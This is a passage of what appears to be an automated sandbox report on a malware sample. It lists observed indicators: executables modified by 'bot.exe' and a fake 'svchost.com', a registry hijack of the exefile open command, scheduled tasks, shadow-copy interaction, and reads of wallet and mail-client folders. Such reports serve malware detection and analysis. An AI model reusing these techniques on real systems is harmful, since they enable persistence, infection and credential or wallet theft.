| File opened for modification | C:\PROGRA~2\WI54FB~1\wmpshare.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\READER~1.0\SETUPF~1\{AC76B~1\Setup.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\GROOVEMN.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~1\wab.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\ACCESS~1\wordpad.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\steam | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\NAMECO~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\WINWORD.EXE | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\wmprph.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Office14\MSTORDB.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI54FB~1\setup_wm.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\EQUATION\EQNEDT32.EXE | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\desktop | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\documents | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] | N/A |
Enumerates physical storage devices
Office loads VBA resources, possible macro or embedded object present
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\nocry.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "411001014" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9F1A87F0-AF3D-11EE-80FA-EAAD54D9E991} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3308111660-3636268597-2291490419-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
